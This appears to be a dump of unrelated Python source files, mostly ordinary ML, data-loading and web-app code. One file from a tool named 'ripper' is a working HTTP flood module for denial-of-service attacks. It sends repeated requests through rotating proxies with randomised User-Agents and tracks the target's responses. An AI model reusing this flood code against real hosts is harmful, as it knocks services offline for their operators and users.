all_label[0], y.detach().cpu().numpy(), axis=0
)
epoch_iterator.set_description("Validating... (loss=%2.5f)" % eval_losses.val)
all_preds, all_label = all_preds[0], all_label[0]
accuracy = simple_accuracy(all_preds, all_label)
logger.info("\n")
logger.info("Validation Results")
logger.info("Valid Loss: %2.5f" % eval_losses.avg)
logger.info("Valid Accuracy: %2.5f" % accuracy)
return accuracy, eval_losses.avg
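# --- Illustrative sketch (not part of the original script) ---
# The validation loop above thresholds sigmoid outputs at 0.5 instead of taking
# an argmax, because each X-ray can carry several labels at once. A small numpy
# version of that thresholding fed through simple_accuracy():
def _multilabel_threshold_demo():
    logits = np.array([[2.0, -1.0, 0.3], [-0.5, 1.5, -2.0]])
    probs = 1.0 / (1.0 + np.exp(-logits))
    preds = (probs > 0.5).astype(int)         # [[1, 0, 1], [0, 1, 0]]
    labels = np.array([[1, 0, 1], [0, 1, 1]])
    return simple_accuracy(preds, labels)     # 5 of 6 entries match -> ~0.833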
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument("--name", required=True,
help="Name of this run. Used for monitoring.")
parser.add_argument("--dataset", choices=["cifar10", "cifar100"], default="cifar10",
help="Which downstream task.")
parser.add_argument("--num_classes",default = 15,type=int,help="the number of class")
parser.add_argument("--model_type", choices=["ViT-B_16", "ViT-B_32", "ViT-L_16",
"ViT-L_32", "ViT-H_14", "R50-ViT-B_16"],
default="ViT-B_16",
help="Which variant to use.")
parser.add_argument("--pretrained_dir", type=str, default="checkpoint/ViT-B_16.npz",
help="Where to search for pretrained ViT models.")
parser.add_argument("--output_dir", default="output", type=str,
help="The output directory where checkpoints will be written.")
parser.add_argument("--img_size", default=224, type=int,
help="Resolution size")
parser.add_argument("--train_batch_size", default=512, type=int,
help="Total batch size for training.")
parser.add_argument("--eval_batch_size", default=64, type=int,
help="Total batch size for eval.")
parser.add_argument("--eval_every", default=100, type=int,
help="Run prediction on validation set every so many steps."
"Will always run one evaluation at the end of training.")
parser.add_argument("--learning_rate", default=3e-2, type=float,
help="The initial learning rate for SGD.")
parser.add_argument("--weight_decay", default=0, type=float,
help="Weight deay if we apply some.")
parser.add_argument("--num_steps", default=10000, type=int,
help="Total number of training epochs to perform.")
parser.add_argument("--decay_type", choices=["cosine", "linear"], default="cosine",
help="How to decay the learning rate.")
parser.add_argument("--warmup_steps", default=500, type=int,
help="Step of training to perform learning rate warmup for.")
parser.add_argument("--max_grad_norm", default=1.0, type=float,
help="Max gradient norm.")
parser.add_argument("--local_rank", type=int, default=-1,
help="local_rank for distributed training on gpus")
parser.add_argument('--seed', type=int, default=42,
help="random seed for initialization")
parser.add_argument('--gradient_accumulation_steps', type=int, default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument('--fp16', action='store_true',
help="Whether to use 16-bit float precision instead of 32-bit")
parser.add_argument('--fp16_opt_level', type=str, default='O2',
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html")
parser.add_argument('--loss_scale', type=float, default=0,
help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
"0 (default value): dynamic loss scaling.\n"
"Positive power of 2: static loss scaling value.\n")
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = '7, 8'
# Setup CUDA, GPU & distributed training
if args.local_rank == -1:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
args.n_gpu = torch.cuda.device_count()
else: # Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
torch.distributed.init_process_group(backend='nccl',
timeout=timedelta(minutes=60))
args.n_gpu = 1
args.device = device
# Setup logging
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO if args.local_rank in [-1, 0] else logging.WARN)
logger.warning("Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s" %
(args.local_rank, args.device, args.n_gpu, bool(args.local_rank != -1), args.fp16))
# Set seed
set_seed(args)
# Model & Tokenizer Setup
args, model = setup(args)
# Testing
dataloaders = get_test_loader()
valid(args, model, dataloaders)
if __name__ == "__main__":
main()
|
501107
|
import sys
import os
import bz2
import pandas as pd
import numpy as np
import MySQLdb
from collections import defaultdict
file_path = os.path.dirname(os.path.realpath(__file__))
growth_lib_path = os.path.abspath(os.path.join(file_path, "..", "common"))
sys.path.insert(0, growth_lib_path)
''' Connect to DB '''
db = MySQLdb.connect(host=os.environ["DATAVIVA_DB_HOST"], user=os.environ[
"DATAVIVA_DB_USER"], passwd=os.environ["DATAVIVA_DB_PW"], db=os.environ["DATAVIVA_DB_NAME"])
cursor = db.cursor()
missing = {
"bra_id": defaultdict(int),
"university_id": defaultdict(int),
"course_hedu_id": defaultdict(int)
}
cursor.execute("select id_ibge, id from attrs_bra where id_ibge is not null and length(id) = 9;")
bra_lookup = {str(r[0]): r[1] for r in cursor.fetchall()}
cursor.execute("select id from attrs_university;")
university_lookup = {str(r[0]): str(r[0]) for r in cursor.fetchall()}
cursor.execute("select id from attrs_course_hedu;")
course_lookup = {str(r[0]): str(r[0]) for r in cursor.fetchall()}
def map_gender(x):
MALE, FEMALE = 0, 1
gender_dict = {MALE: 'A', FEMALE: 'B'}
try:
return str(gender_dict[int(x)])
except:
print x
sys.exit()
def map_color(color):
WHITE = 1
BLACK = 2
MULTI = 3
ASIAN = 4
INDIAN = 5
UNIDENTIFIED = 6
color_dict = {UNIDENTIFIED: 'H', INDIAN: 'C', WHITE: 'D',
BLACK: 'E', ASIAN: 'F', MULTI: 'G', 9: 'H', -1: 'H', 0: 'H'}
try:
return str(color_dict[int(color)])
except Exception, e:
raise Exception("Unknown color: error %s" % e)
def map_loc(loc):
URBAN, RURAL = 1, 2
loc_dict = {URBAN: 'N', RURAL: 'O'}
try:
return str(loc_dict[int(loc)])
except:
print loc
sys.exit()
def map_school_type(st):
FEDERAL, STATE, LOCAL, PROFIT_PRIVATE, NONPROFIT_PRIVATE, SPECIAL, SPECIAL_2015 = 1, 2, 3, 4, 5, 6, 7
loc_dict = {FEDERAL: 'P', STATE: 'Q', LOCAL: 'R', PROFIT_PRIVATE: 'S',
NONPROFIT_PRIVATE: 'T', SPECIAL: 'U', SPECIAL_2015: 'U'}
try:
return str(loc_dict[int(st)])
except:
print st
sys.exit()
def floatvert(x):
x = x.replace(',', '.')
try:
return float(x)
except:
return np.nan
def bra_replace(raw):
try:
return bra_lookup[str(raw).strip()]
except:
missing["bra_id"][raw] += 1
return "0xx000007"
def university_replace(raw):
try:
return university_lookup[str(raw).strip().zfill(5)]
except:
missing["university_id"][raw] += 1
return None
def course_replace(raw):
try:
return course_lookup[str(raw)]
except:
missing["course_hedu_id"][raw] += 1
return "000000"
def to_df(file_path, year, indexes=None):
if "bz2" in file_path:
input_file = bz2.BZ2File(file_path)
else:
input_file = open(file_path, "rU")
if indexes:
converters = {"course_hedu_id": str, "university_id": str}
df = pd.read_csv(input_file, sep="\t", converters=converters, engine='python')
df = df.set_index(indexes)
else:
cols = ["university_id", "school_type", "academic_organization", "course_id_bad",
"degree", "modality", "level", "student_id", "enrolled", "graduates", "entrants",
"Year_entry", "gender", "age", "ethnicity", "bra_id", "course_hedu_id", "course_name",
"morning", "afternoon", "night", "full_time", "year"]
delim = ";"
coerce_cols = {"bra_id": bra_replace, "university_id": university_replace,
"course_hedu_id": course_replace, "ethnicity": map_color, "gender": map_gender,
"school_type": map_school_type}
df = pd.read_csv(input_file, header=0, sep=delim, names=cols, converters=coerce_cols)
df = df.drop(
["course_name", "modality", "Year_entry", "degree", "course_id_bad", "academic_organization", "level"],
axis=1
)
df = df[df["year"] == int(year)]
for col, missings in missing.items():
if not len(missings):
continue
num_rows = df.shape[0]
print
print "[WARNING]"
print "The following {0} IDs are not in the DB. Total: ".format(col, num_rows)
print list(missings)
return df
|
501207
|
import random
import re
from contextlib import suppress
from socket import socket
from socks import ProxyError
from ripper.constants import HTTP_STATUS_CODE_CHECK_PERIOD_SEC
from ripper.context.events_journal import EventsJournal
from ripper.context.target import Target
from ripper.actions.attack_method import AttackMethod
from ripper.proxy import Proxy
HTTP_STATUS_PATTERN = re.compile(r" (\d{3}) ")
# Forward Reference
Context = 'Context'
events_journal = EventsJournal()
class HttpFlood(AttackMethod):
"""HTTP Flood method."""
name: str = 'HTTP Flood'
label: str = 'http-flood'
_target: Target
_ctx: Context
_proxy: Proxy = None
_http_connect: socket = None
def __init__(self, target: Target, context: Context):
self._target = target
self._ctx = context
def create_connection(self):
self._proxy = self._ctx.proxy_manager.get_random_proxy()
conn = self._ctx.sock_manager.create_tcp_socket(self._proxy)
return conn
def __call__(self, *args, **kwargs):
with suppress(Exception), self.create_connection() as self._http_connect:
self._http_connect.connect(self._target.hostip_port_tuple())
self._target.stats.connect.status_success()
events_journal.info('Creating HTTP connection...', target=self._target)
while self.send(self._http_connect):
if self._ctx.dry_run:
break
continue
self._ctx.target.stats.connect.status_failed()
# TODO remove from flood class, status name is not part of flood program
def _send_event_with_status(self, code: int):
base = 'Checked Response status...'
if code < 300:
events_journal.info(f'{base} {code}: Success', target=self._target)
        elif 299 < code < 400:
events_journal.warn(f'{base} {code}: Redirection', target=self._target)
elif code == 400:
events_journal.warn(f'{base} {code}: Bad Request', target=self._target)
        elif 400 < code <= 403:
events_journal.warn(f'{base} {code}: Forbidden', target=self._target)
elif code == 404:
events_journal.warn(f'{base} {code}: Not Found', target=self._target)
        elif 404 < code < 408:
events_journal.warn(f'{base} {code}: Not Acceptable or Not Allowed', target=self._target)
elif code == 408:
events_journal.warn(f'{base} {code}: Request Timeout', target=self._target)
        elif 408 < code < 429:
events_journal.error(f'{base} {code}: Client Error', target=self._target)
elif code == 429:
events_journal.error(f'{base} {code}: Too Many Requests', target=self._target)
        elif 429 < code < 459:
events_journal.error(f'{base} {code}: Client Error', target=self._target)
        elif 460 <= code <= 463:
events_journal.error(f'{base} {code}: AWS Load Balancer Error', target=self._target)
        elif 499 < code <= 511:
events_journal.error(f'{base} {code}: Server Error', target=self._target)
        elif 520 <= code <= 530:
events_journal.error(f'{base} {code}: CloudFlare Reverse Proxy Error', target=self._target)
else:
events_journal.error(f'{base} {code}: Custom Error', target=self._target)
def check_response_status(self, payload: bytes):
with suppress(Exception):
if self._ctx.time_interval_manager.check_timer_elapsed(HTTP_STATUS_CODE_CHECK_PERIOD_SEC):
check_sock = self.create_connection()
check_sock.connect(self._target.hostip_port_tuple())
check_sock.send(payload)
http_response = repr(check_sock.recv(32))
check_sock.close()
status = int(re.search(HTTP_STATUS_PATTERN, http_response)[1])
self._target.stats.http_stats[status] += 1
self._send_event_with_status(status)
def send(self, sock: socket) -> bool:
payload = self.payload().encode('utf-8')
try:
sent = sock.send(payload)
self.check_response_status(payload)
except ProxyError:
self._ctx.proxy_manager.delete_proxy_sync(self._proxy)
except Exception as e:
self._target.stats.connect.status_failed()
events_journal.exception(e, target=self._target)
else:
self._target.stats.packets.status_sent(sent)
self._proxy.report_success() if self._proxy is not None else 0
return True
return False
def headers(self, content: str = '') -> dict[str, str]:
"""Prepare headers."""
headers = self._ctx.headers_provider.headers
headers['Content-Length'] = str(len(content))
headers['User-Agent'] = random.choice(self._ctx.headers_provider.user_agents)
return headers
def payload(self, body: str = '') -> str:
"""Generate payload for Request."""
body_content = f'{body}\r\n\r\n' if body else '\r\n'
headers = '\r\n'.join([f'{key}: {value}' for (key, value) in self.headers(body).items()])
request = '{} {} HTTP/1.1\r\nHost: {}\r\n{}\r\n{}'.format(
self._target.http_method.upper(),
self._target.http_path,
self._target.host,
headers,
body_content
)
return request
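# --- Illustrative sketch (not part of the original module) ---
# Rough shape of the request string produced by payload() above, built here
# with hard-coded example values (method, path, host and headers are made up).
def _payload_demo():
    headers = {'Content-Length': '0', 'User-Agent': 'example-agent/1.0'}
    header_block = '\r\n'.join(f'{key}: {value}' for key, value in headers.items())
    request = '{} {} HTTP/1.1\r\nHost: {}\r\n{}\r\n{}'.format(
        'GET', '/', 'example.com', header_block, '\r\n')
    return request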
|
501274
|
import os, glob
from conans import CMake, ConanFile, tools
class MdnsConan(ConanFile):
name = "mdns"
license = "Unlicense"
homepage = "https://github.com/mjansson/mdns"
url = "https://github.com/conan-io/conan-center-index"
description = "Public domain mDNS/DNS-SD library in C"
topics = ("conan", "mdns", "dns", "dns-sd")
settings = "os"
no_copy_source = True
@property
def _source_subfolder(self):
return "source_subfolder"
def source(self):
tools.get(**self.conan_data["sources"][self.version])
extracted_dir = glob.glob('mdns-*/')[0]
os.rename(extracted_dir, self._source_subfolder)
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
self.copy(pattern="*.h", dst="include", src=self._source_subfolder)
def package_info(self):
if self.settings.os == "Windows":
self.cpp_info.system_libs = ["iphlpapi", "ws2_32"]
if str(self.settings.os) in ["Linux", "Android"]:
self.cpp_info.system_libs.append('pthread')
def package_id(self):
self.info.header_only()
|
501307
|
import re
from collections import OrderedDict
from datetime import timedelta
from logging import Handler, LogRecord
from pathlib import Path
from threading import Thread
from typing import Dict, Any, TYPE_CHECKING, List, Optional, Union, Type, Tuple
from django.core.exceptions import ObjectDoesNotExist
from django.utils import timezone
from django.db.models import ForeignObject, Model
if TYPE_CHECKING:
# we need to do this, to avoid circular imports
from automated_logging.models import (
RequestEvent,
ModelEvent,
ModelValueModification,
ModelRelationshipModification,
)
class DatabaseHandler(Handler):
def __init__(
self, *args, batch: Optional[int] = 1, threading: bool = False, **kwargs
):
self.limit = batch or 1
self.threading = threading
self.instances = OrderedDict()
super(DatabaseHandler, self).__init__(*args, **kwargs)
@staticmethod
def _clear(config):
from automated_logging.models import ModelEvent, RequestEvent, UnspecifiedEvent
from django.db import transaction
current = timezone.now()
with transaction.atomic():
if config.model.max_age:
ModelEvent.objects.filter(
created_at__lte=current - config.model.max_age
).delete()
if config.unspecified.max_age:
UnspecifiedEvent.objects.filter(
created_at__lte=current - config.unspecified.max_age
).delete()
if config.request.max_age:
RequestEvent.objects.filter(
created_at__lte=current - config.request.max_age
).delete()
def save(self, instance=None, commit=True, clear=True):
"""
Internal save procedure.
Handles deletion when an event exceeds max_age
and batch saving via atomic transactions.
:return: None
"""
from django.db import transaction
from automated_logging.settings import settings
if instance:
self.instances[instance.pk] = instance
if len(self.instances) < self.limit:
if clear:
self._clear(settings)
return instance
if not commit:
return instance
def database(instances, config):
""" wrapper so that we can actually use threading """
with transaction.atomic():
[i.save() for k, i in instances.items()]
if clear:
self._clear(config)
instances.clear()
if self.threading:
thread = Thread(
group=None, target=database, args=(self.instances, settings)
)
thread.start()
else:
database(self.instances, settings)
return instance
def get_or_create(self, target: Type[Model], **kwargs) -> Tuple[Model, bool]:
"""
proxy for "get_or_create" from django,
instead of creating it immediately we
        add it to the list of objects to be created in a single swoop
        :param target: Model to be get_or_create
        :param kwargs: properties to be used to find and create the new object
"""
created = False
try:
instance = target.objects.get(**kwargs)
except ObjectDoesNotExist:
instance = target(**kwargs)
self.save(instance, commit=False, clear=False)
created = True
return instance, created
def prepare_save(self, instance: Model):
"""
Due to the nature of all modifications and such there are some models
that are in nature get_or_create and not creations
(we don't want so much additional data)
This is a recursive function that looks for relationships and
replaces specific values with their get_or_create counterparts.
:param instance: model
:return: instance that is suitable for saving
"""
from automated_logging.models import (
Application,
ModelMirror,
ModelField,
ModelEntry,
)
if isinstance(instance, Application):
return Application.objects.get_or_create(name=instance.name)[0]
elif isinstance(instance, ModelMirror):
return self.get_or_create(
ModelMirror,
name=instance.name,
application=self.prepare_save(instance.application),
)[0]
elif isinstance(instance, ModelField):
entry, _ = self.get_or_create(
ModelField,
name=instance.name,
mirror=self.prepare_save(instance.mirror),
)
if entry.type != instance.type:
entry.type = instance.type
self.save(entry, commit=False, clear=False)
return entry
elif isinstance(instance, ModelEntry):
entry, _ = self.get_or_create(
ModelEntry,
mirror=self.prepare_save(instance.mirror),
primary_key=instance.primary_key,
)
if entry.value != instance.value:
entry.value = instance.value
self.save(entry, commit=False, clear=False)
return entry
# ForeignObjectRel is untouched rn
for field in [
f
for f in instance._meta.get_fields()
if isinstance(f, ForeignObject)
and getattr(instance, f.name, None) is not None
# check the attribute module really being automated_logging
# to make sure that we do not follow down a rabbit hole
and getattr(instance, f.name).__class__.__module__.split('.', 1)[0]
== 'automated_logging'
]:
setattr(
instance, field.name, self.prepare_save(getattr(instance, field.name))
)
self.save(instance, commit=False, clear=False)
return instance
def unspecified(self, record: LogRecord) -> None:
"""
This is for messages that are not sent from django-automated-logging.
The option to still save these log messages is there. We create
the event in the handler and then save them.
:param record:
:return:
"""
from automated_logging.models import UnspecifiedEvent, Application
from automated_logging.signals import unspecified_exclusion
from django.apps import apps
event = UnspecifiedEvent()
if hasattr(record, 'message'):
event.message = record.message
event.level = record.levelno
event.line = record.lineno
event.file = Path(record.pathname)
# this is semi-reliable, but I am unsure of a better way to do this.
applications = apps.app_configs.keys()
path = Path(record.pathname)
candidates = [p for p in path.parts if p in applications]
if candidates:
# use the last candidate (closest to file)
event.application = Application(name=candidates[-1])
elif record.module in applications:
# if we cannot find the application, we use the module as application
event.application = Application(name=record.module)
else:
# if we cannot determine the application from the application
# or from the module we presume that the application is unknown
event.application = Application(name=None)
if not unspecified_exclusion(event):
self.prepare_save(event)
self.save(event)
def model(
self,
record: LogRecord,
event: 'ModelEvent',
modifications: List['ModelValueModification'],
data: Dict[str, Any],
) -> None:
"""
This is for model specific logging events.
Compiles the information into an event and saves that event
and all modifications done.
:param event:
:param modifications:
:param record:
:param data:
:return:
"""
self.prepare_save(event)
self.save(event)
for modification in modifications:
modification.event = event
self.prepare_save(modification)
            self.save(modification)
def m2m(
self,
record: LogRecord,
event: 'ModelEvent',
relationships: List['ModelRelationshipModification'],
data: Dict[str, Any],
) -> None:
self.prepare_save(event)
self.save(event)
for relationship in relationships:
relationship.event = event
self.prepare_save(relationship)
self.save(relationship)
def request(self, record: LogRecord, event: 'RequestEvent') -> None:
"""
The request event already has a model prepared that we just
need to prepare and save.
:param record: LogRecord
:param event: Event supplied via the LogRecord
:return: nothing
"""
self.prepare_save(event)
self.save(event)
def emit(self, record: LogRecord) -> None:
"""
Emit function that gets triggered for every log message in scope.
The record will be processed according to the action set.
:param record:
:return:
"""
if not hasattr(record, 'action'):
return self.unspecified(record)
if record.action == 'model':
return self.model(record, record.event, record.modifications, record.data)
elif record.action == 'model[m2m]':
return self.m2m(record, record.event, record.relationships, record.data)
elif record.action == 'request':
return self.request(record, record.event)
|
501314
|
from ..core import aio
from progressivis import ProgressiveError
from ..table.module import TableModule
from ..utils.psdict import PsDict
class DynVar(TableModule):
def __init__(self, init_val=None, vocabulary=None, **kwds):
super().__init__(**kwds)
self._has_input = False
if not (vocabulary is None or isinstance(vocabulary, dict)):
raise ProgressiveError('vocabulary must be a dictionary')
self._vocabulary = vocabulary
if not (init_val is None or isinstance(init_val, dict)):
raise ProgressiveError('init_val must be a dictionary')
self._table = PsDict({} if init_val is None else init_val)
def is_input(self):
return True
def has_input(self):
return self._has_input
    def run_step(self, run_number, step_size, howlong):
return self._return_run_step(self.state_blocked, steps_run=1)
#raise StopIteration()
async def from_input(self, input_):
#import pdb;pdb.set_trace()
if not isinstance(input_, dict):
raise ProgressiveError('Expecting a dictionary')
last = PsDict(self._table) # shallow copy
values = input_
if self._vocabulary is not None:
values = {self._vocabulary[k]: v for k, v in values.items()}
for (k, v) in input_.items():
last[k] = v
await self.scheduler().for_input(self)
#last['_update'] = run_number
self._table.update(values)
self._has_input = True
await aio.sleep(0)
return ''
|
501317
|
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from DeepRL.Agent import DoubleDQNAgent
from DeepRL.Env.gym_wrapper import CartPoleEnv
from DeepRL.Replay import NaiveReplay
from DeepRL.Train import Train
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class Model(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(4, 4)
self.fc2 = nn.Linear(4, 2)
def forward(self, x: torch.Tensor):
x = F.tanh(self.fc1(x))
x = self.fc2(x)
return x
if __name__ == '__main__':
model = Model()
agent = DoubleDQNAgent(
_model=model, _env=CartPoleEnv(),
_gamma=0.9, _batch_size=32,
_epsilon_init=1.0, _epsilon_decay=0.9999,
_epsilon_underline=0.1,
_replay=NaiveReplay(),
_optimizer=optim.SGD(model.parameters(), 0.001, 0.9)
)
agent.config.epoch_show_log = 100
train = Train(
agent,
_epoch_max=10000,
_step_init=100,
_step_train=1,
_step_update_target=1000,
_step_save=10000000,
)
train.run()
|
501365
|
import os
import argparse
import numpy as np
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from utils.outputlib import WriteConfusionSeaborn
import torch
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--max_epochs', type=int, default=15)
parser.add_argument('--maxseqlen', type=float, default=10)
parser.add_argument('--nworkers', type=int, default=4)
parser.add_argument('--precision', type=int, choices=[16, 32], default=32)
parser.add_argument('--saving_path', type=str, default='downstream/checkpoints/custom')
parser.add_argument('--datadir', type=str, required=True)
parser.add_argument('--labeldir', type=str, required=True)
parser.add_argument('--pretrained_path', type=str, default=None)
parser.add_argument('--model_type', type=str, choices=['wav2vec', 'wav2vec2'], default='wav2vec2')
parser.add_argument('--save_top_k', type=int, default=1)
parser.add_argument('--num_exps', type=int, default=1)
parser.add_argument('--outputfile', type=str, default=None)
args = parser.parse_args()
hparams = args
from downstream.Custom.trainer import DownstreamGeneral
if not os.path.exists(hparams.saving_path):
os.makedirs(hparams.saving_path)
nfolds = len(os.listdir(hparams.labeldir))
for foldlabel in os.listdir(hparams.labeldir):
assert foldlabel[-5:] == '.json'
metrics, confusion = np.zeros((4, args.num_exps, nfolds)), 0.
for exp in range(args.num_exps):
for ifold, foldlabel in enumerate(os.listdir(hparams.labeldir)):
print (f"Running experiment {exp+1} / {args.num_exps}, fold {ifold+1} / {nfolds}...")
hparams.labelpath = os.path.join(hparams.labeldir, foldlabel)
model = DownstreamGeneral(hparams)
checkpoint_callback = ModelCheckpoint(
dirpath=hparams.saving_path,
filename='{epoch:02d}-{valid_loss:.3f}-{valid_UAR:.5f}' if hasattr(model, 'valid_met') else None,
save_top_k=args.save_top_k if hasattr(model, 'valid_met') else 0,
verbose=True,
save_weights_only=True,
monitor='valid_UAR' if hasattr(model, 'valid_met') else None,
mode='max'
)
trainer = Trainer(
precision=args.precision,
amp_backend='native',
callbacks=[checkpoint_callback] if hasattr(model, 'valid_met') else None,
checkpoint_callback=hasattr(model, 'valid_met'),
resume_from_checkpoint=None,
check_val_every_n_epoch=1,
max_epochs=hparams.max_epochs,
num_sanity_val_steps=2 if hasattr(model, 'valid_met') else 0,
gpus=1,
logger=False
)
trainer.fit(model)
if hasattr(model, 'valid_met'):
trainer.test()
else:
trainer.test(model)
met = model.test_met
metrics[:, exp, ifold] = np.array([met.uar*100, met.war*100, met.macroF1*100, met.microF1*100])
confusion += met.m
outputstr = "+++ SUMMARY +++\n"
for nm, metric in zip(('UAR [%]', 'WAR [%]', 'macroF1 [%]', 'microF1 [%]'), metrics):
outputstr += f"Mean {nm}: {np.mean(metric):.2f}\n"
outputstr += f"Fold Std. {nm}: {np.mean(np.std(metric, 1)):.2f}\n"
outputstr += f"Fold Median {nm}: {np.mean(np.median(metric, 1)):.2f}\n"
outputstr += f"Run Std. {nm}: {np.std(np.mean(metric, 1)):.2f}\n"
outputstr += f"Run Median {nm}: {np.median(np.mean(metric, 1)):.2f}\n"
if args.outputfile:
with open(args.outputfile, 'w') as f:
f.write(outputstr)
else:
print (outputstr)
#This may cause trouble if emotion categories are not consistent across folds?
WriteConfusionSeaborn(
confusion,
model.dataset.emoset,
os.path.join(args.saving_path, 'confmat.png')
)
|
501384
|
import asyncio
import logging
import pathlib
import aiohttp_jinja2
import jinja2
from aiohttp import web
from aiohttp_security import setup as setup_security
from aiohttp_security import CookiesIdentityPolicy
from motortwit.routes import setup_routes
from motortwit.security import AuthorizationPolicy
from motortwit.utils import (format_datetime, init_mongo, load_config,
robo_avatar_url)
from motortwit.views import SiteHandler
PROJ_ROOT = pathlib.Path(__file__).parent.parent
TEMPLATES_ROOT = pathlib.Path(__file__).parent / 'templates'
async def setup_mongo(app, conf, loop):
mongo = await init_mongo(conf['mongo'], loop)
async def close_mongo(app):
mongo.client.close()
app.on_cleanup.append(close_mongo)
return mongo
def setup_jinja(app):
jinja_env = aiohttp_jinja2.setup(
app, loader=jinja2.FileSystemLoader(str(TEMPLATES_ROOT)))
jinja_env.filters['datetimeformat'] = format_datetime
jinja_env.filters['robo_avatar_url'] = robo_avatar_url
async def init(loop):
conf = load_config(PROJ_ROOT / 'config' / 'config.yml')
app = web.Application(loop=loop)
mongo = await setup_mongo(app, conf, loop)
setup_jinja(app)
setup_security(app, CookiesIdentityPolicy(), AuthorizationPolicy(mongo))
# setup views and routes
handler = SiteHandler(mongo)
setup_routes(app, handler, PROJ_ROOT)
host, port = conf['host'], conf['port']
return app, host, port
async def get_app():
"""Used by aiohttp-devtools for local development."""
import aiohttp_debugtoolbar
app, _, _ = await init(asyncio.get_event_loop())
aiohttp_debugtoolbar.setup(app)
return app
def main():
logging.basicConfig(level=logging.DEBUG)
loop = asyncio.get_event_loop()
app, host, port = loop.run_until_complete(init(loop))
web.run_app(app, host=host, port=port)
if __name__ == '__main__':
main()
|
501406
|
from amadeus.client.decorator import Decorator
class Activity(Decorator, object):
def __init__(self, client, activity_id):
Decorator.__init__(self, client)
self.activity_id = activity_id
def get(self, **params):
'''
Returns a single activity from a given id.
.. code-block:: python
client.shopping.activities('4615').get()
:rtype: amadeus.Response
:raises amadeus.ResponseError: if the request could not be completed
'''
return self.client.get('/v1/shopping/activities/{0}'
.format(self.activity_id), **params)
|
501463
|
import os,re,glob
import numpy as np
from collections import defaultdict
import subprocess
import pandas as pd
RNA_dict = {'SRR3184279':'Pt1','SRR3184280':'Pt2','SRR3184281':'Pt4','SRR3184282':'Pt5','SRR3184283':'Pt6',
'SRR3184284': 'Pt7','SRR3184285':'Pt8','SRR3184286':'Pt9','SRR3184287':'Pt10','SRR3184288':'Pt12',
'SRR3184289': 'Pt13','SRR3184290':'Pt14','SRR3184291':'Pt15','SRR3184292':'Pt16','SRR3184293':'Pt19',
'SRR3184294': 'Pt20','SRR3184295':'Pt22','SRR3184296':'Pt23','SRR3184297':'Pt25','SRR3184300':'Pt28',
'SRR3184301':'Pt29','SRR3184302':'Pt31','SRR3184303':'Pt32','SRR3184304': 'Pt35','SRR3184305':'Pt37',
'SRR3184306':'Pt38'}
SRRs = ['SRR3184279', 'SRR3184280', 'SRR3184281', 'SRR3184282', 'SRR3184283', 'SRR3184284', 'SRR3184285', 'SRR3184286',
'SRR3184287', 'SRR3184288', 'SRR3184289', 'SRR3184290', 'SRR3184291', 'SRR3184292', 'SRR3184293', 'SRR3184294',
'SRR3184295', 'SRR3184296', 'SRR3184297', 'SRR3184300', 'SRR3184301', 'SRR3184302', 'SRR3184303', 'SRR3184304',
'SRR3184305', 'SRR3184306']
Pts = ['Pt1', 'Pt2', 'Pt4', 'Pt5', 'Pt6', 'Pt7', 'Pt9', 'Pt10', 'Pt12', 'Pt13', 'Pt14', 'Pt15', 'Pt16',
'Pt19', 'Pt20', 'Pt22', 'Pt23', 'Pt25', 'Pt28', 'Pt29', 'Pt31', 'Pt32', 'Pt35', 'Pt37', 'Pt38']
kmers = [9,10,11]
def cal(x):
return 1 / (1 + np.exp(5 *(x-2)))
def f1(Rm,Rn,self_similar,H,R,A,mismatch,comb):
score = Rm * (1 - Rn / 2 ** mismatch) * R * comb * H
return score
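# --- Illustrative sketch (not part of the original script) ---
# Worked example of the scoring functions above, with made-up inputs: cal()
# squashes a binding rank through a logistic curve, and f1() combines the
# mutant/normal terms with the remaining factors (R, H, comb).
def _score_demo():
    Rm = cal(0.5)    # low rank -> cal() close to 1
    Rn = cal(10.0)   # high rank -> cal() close to 0
    return f1(Rm=Rm, Rn=Rn, self_similar=0, H=1.0, R=1.0, A=1.0, mismatch=1, comb=1.0)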
def getfusionScore():
mydict = {}
for Pt in Pts:
filein = '/home/wzt/project/GeneFusion/Data2/{}/fusion_score.tsv'.format(Pt)
if not os.path.isfile(filein):
continue
with open(filein,'r') as fin:
fin.readline()
for line in fin:
lines = line.strip().split('\t')
if len(lines[3]) not in kmers:
continue
Rm = cal(float(lines[6]))
Rn = cal(float(lines[11]))
R = float(lines[15])
A = float(lines[16])
self_similar,H,mismatch, comb = map(float,[lines[14],lines[13],lines[2],lines[7]])
score = f1(Rm=Rm,Rn=Rn,self_similar = self_similar,H=H,R=R,mismatch=mismatch,comb=comb,A=A)
if score < 0:
score = 0
mydict[Pt] = mydict.get(Pt,0) + score
return mydict
def getSNVIndelScore():
mydict = {}
for Pt in Pts:
filein = '/home/wzt/project/GeneFusion/Data2/{}/{}.filter.mupexi'.format(Pt,Pt)
with open(filein,'r') as fin:
fin.readline()
for line in fin:
lines = line.strip().split('\t')
if len(lines[3]) not in kmers:
continue
Rm = cal(float(lines[6]))
Rn = cal(float(lines[11]))
R = float(lines[15])
A = float(lines[16])
self_similar,H,mismatch, comb = map(float,[lines[14],lines[13],lines[2],lines[7]])
score = f1(Rm=Rm,Rn=Rn,self_similar = self_similar,H=H,R=R,mismatch=mismatch,comb=comb,A = A)
if score < 0:
score = 0
mydict[Pt] = mydict.get(Pt,0) + score
return mydict
def main():
myPFS = {}
